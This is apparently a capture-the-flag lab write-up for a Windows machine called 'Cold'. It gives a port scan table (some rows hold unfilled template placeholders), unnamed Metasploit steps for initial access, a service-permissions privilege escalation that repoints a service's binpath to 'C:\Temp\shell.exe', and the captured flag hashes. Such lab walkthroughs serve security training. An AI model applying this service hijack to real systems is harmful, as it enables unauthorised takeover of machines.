Info

  • Name – Cold
  • IP Address – 172.31.1.15

Enumeration

Open Ports

PortProtocolServiceVersion
80tcphttpApache httpd 2.4.43
135tcpmsrpcMicrosoft Windows RPC
137udpnetbios-nsMicrosoft Windows netbios-ns
139tcpnetbios-ssnMicrosoft Windows netbios-ssn
443tcphttpApache httpd 2.4.43
445tcpmicrosoft-dsMicrosoft Windows Server 2008 R2 – 2012 microsoft-ds
1243tcpserialgateway
3389tcpms-wbt-server
5500tcphttpJetty 9.3.6.v20151106
5985tcphttpMicrosoft HTTPAPI httpd 2.0
6095tcpunknown
6096tcp[service.name][service.product] [service.version]
7993tcp[service.name][service.product] [service.version]
8018tcpajp13Apache Jserv
8500tcpfmtp
8581tcpunknown
20007tcp[service.name][service.product] [service.version]
20008tcp[service.name][service.product] [service.version]
47001tcphttpMicrosoft HTTPAPI httpd 2.0
47001tcpmsrpcMicrosoft Windows RPC
49153tcpmsrpcMicrosoft Windows RPC
49154tcpmsrpcMicrosoft Windows RPC
49155tcpmsrpcMicrosoft Windows RPC
49161tcpmsrpcMicrosoft Windows RPC
49193tcpmsrpcMicrosoft Windows RPC
49194tcpmsrpcMicrosoft Windows RPC

Exploitation

Exploit Details (MetaSploit)

Show Metasploit options

show options

Run exploit

run
whoami
type C:\Users\jade\Desktop\access.txt

Privilege Escalation

Exploit Details (Service Permissions)

  • Name – Service Permissions
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A
set servicename=cold
sc config %servicename% binpath= "C:\Temp\shell.exe"
net start %servicename%
whoami
type C:\Users\Administrator\Desktop\system.txt

Loot

access.txt - cb6d4de6b3ca3b97e7247fd90a3e0c72
system.txt - 0ef516f5bd8895026f9e34947233a1e8